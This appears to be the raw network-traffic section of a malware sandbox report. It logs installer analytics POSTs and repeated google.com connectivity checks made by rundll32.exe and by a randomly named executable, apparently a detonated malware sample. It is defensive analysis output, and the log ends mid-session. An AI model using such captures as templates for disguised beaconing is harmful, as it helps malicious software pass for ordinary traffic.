                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:49:57.716372013 CEST12481OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 165
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Sep 29, 2022 14:49:57.716450930 CEST12481OUTData Raw: 76 3d 32 26
                                                                                                                                                Data Ascii: v=2&
                                                                                                                                                Sep 29, 2022 14:49:57.716469049 CEST12482OUTData Raw: 61 69 64 3d 35 37 36 33 30 31 34 39 36 37 62 66 35 66 65 37 37 31 39 30 34 62 37 30 26
                                                                                                                                                Data Ascii: aid=5763014967bf5fe771904b70&
                                                                                                                                                Sep 29, 2022 14:49:57.716487885 CEST12482OUTData Raw: 61 76 3d 31 2e 30 2e 30 2e 30 26
                                                                                                                                                Data Ascii: av=1.0.0.0&
                                                                                                                                                Sep 29, 2022 14:49:57.716506958 CEST12482OUTData Raw: 63 69 64 3d 35 38 44 36 45 42 39 44 35 32 37 41 46 42 37 32 33 44 37 42 46 45 45 42 41 39 31 46 31 35 37 34 39 30 42 35 45 30 38 33 26
                                                                                                                                                Data Ascii: cid=58D6EB9D527AFB723D7BFEEBA91F157490B5E083&
                                                                                                                                                Sep 29, 2022 14:49:57.716526031 CEST12482OUTData Raw: 73 69 64 3d 25 37 42 34 45 33 35 37 35 31 37 2d 36 43 33 32 2d 34 46 45 39 2d 38 30 37 43 2d 42 33 42 46 34 41 31 44 35 35 42 34 25 37 44 26
                                                                                                                                                Data Ascii: sid=%7B4E357517-6C32-4FE9-807C-B3BF4A1D55B4%7D&
                                                                                                                                                Sep 29, 2022 14:49:57.716542959 CEST12482OUTData Raw: 74 3d 6c 69 66 65 63 79 63 6c 65 26
                                                                                                                                                Data Ascii: t=lifecycle&
                                                                                                                                                Sep 29, 2022 14:49:57.716567039 CEST12482OUTData Raw: 71 74 3d 31 35 35 36 32 26
                                                                                                                                                Data Ascii: qt=15562&
                                                                                                                                                Sep 29, 2022 14:49:57.716584921 CEST12482OUTData Raw: 6c 63 3d 73 74 61 72 74
                                                                                                                                                Data Ascii: lc=start
                                                                                                                                                Sep 29, 2022 14:49:57.856988907 CEST12483INHTTP/1.1 402 Payment Required
                                                                                                                                                Cache-control: no-cache="set-cookie"
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:57 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                Set-Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7;PATH=/;MAX-AGE=600
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:49:57.966311932 CEST12489OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 177
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:49:57.966311932 CEST12489OUTData Raw: 76 3d 32 26
                                                                                                                                                Data Ascii: v=2&
                                                                                                                                                Sep 29, 2022 14:49:57.966311932 CEST12489OUTData Raw: 61 69 64 3d 35 37 36 33 30 31 34 39 36 37 62 66 35 66 65 37 37 31 39 30 34 62 37 30 26
                                                                                                                                                Data Ascii: aid=5763014967bf5fe771904b70&
                                                                                                                                                Sep 29, 2022 14:49:58.108520985 CEST12490INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:58 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:49:58.384201050 CEST12511OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 179
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:49:58.524646044 CEST12512INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:58 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:49:59.019296885 CEST12513OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 182
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:49:59.159784079 CEST12514INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:59 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:49:59.631701946 CEST12514OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 178
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:49:59.772388935 CEST12515INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:49:59 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:49:59.984247923 CEST12516OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 172
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:50:00.124775887 CEST12517INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:00 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:50:00.274991035 CEST12518OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 181
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:50:00.415796041 CEST12520INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:00 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:50:00.484364033 CEST12520OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 181
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:50:00.625000954 CEST12522INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:00 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:50:01.025367022 CEST12522OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 181
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:50:01.165891886 CEST12524INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:01 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:50:01.243752956 CEST12524OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 183
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:50:01.385286093 CEST12525INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:01 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:50:01.590975046 CEST12526OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 189
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:50:01.731559992 CEST12527INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:01 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:50:02.016701937 CEST12527OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 181
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:50:02.157391071 CEST12528INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:02 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:50:02.366935968 CEST12529OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 174
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:50:02.507514954 CEST12530INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:02 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:50:02.757610083 CEST12530OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 170
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:50:02.898022890 CEST12531INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:02 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:50:03.113019943 CEST12532OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 177
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:50:03.312546968 CEST12533INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:03 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}
                                                                                                                                                Sep 29, 2022 14:50:03.652240992 CEST12534OUTPOST / HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                User-Agent: AdvinstAnalytics/1.0 (Microsoft Windows NT 10.0.17134 ; x64)
                                                                                                                                                Host: collect.installeranalytics.com
                                                                                                                                                Content-Length: 173
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: AWSELB=D7177B5704D1BF661882EF94F6A835B9FB0EACE97C49CE22FDEE1CA1001AFF5F71AA12E5F06B26C30D4C68D2091FE6ED40F621B6434D87C1489153A94C392995E08A8228A7
                                                                                                                                                Sep 29, 2022 14:50:03.792782068 CEST12536INHTTP/1.1 402 Payment Required
                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:03 GMT
                                                                                                                                                ETag: W/"2-vyGp6PvFo4RvsFtPoIWeCReyIC8"
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Content-Length: 2
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 7b 7d
                                                                                                                                                Data Ascii: {}


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                114192.168.2.349777172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:00.313585997 CEST12518OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                115172.217.168.1480192.168.2.349777C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:00.356935024 CEST12519INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:00 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:50:00 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>
                                                                                                                                                Sep 29, 2022 14:50:00.577830076 CEST12521INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:00 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:50:00 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                116192.168.2.349780172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:03.671821117 CEST12535OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                117172.217.168.1480192.168.2.349780C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:03.717571020 CEST12535INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:03 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:50:03 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                118192.168.2.349784172.217.168.1480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:08.743513107 CEST14244OUTGET / HTTP/1.1
                                                                                                                                                Host: google.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                119172.217.168.1480192.168.2.349784C:\Users\user\fakAAcAY\dekAkckQ.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Sep 29, 2022 14:50:08.787147999 CEST14245INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Location: http://www.google.com/
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:08 GMT
                                                                                                                                                Expires: Sat, 29 Oct 2022 12:50:08 GMT
                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                Server: gws
                                                                                                                                                Content-Length: 219
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                X-Frame-Options: SAMEORIGIN
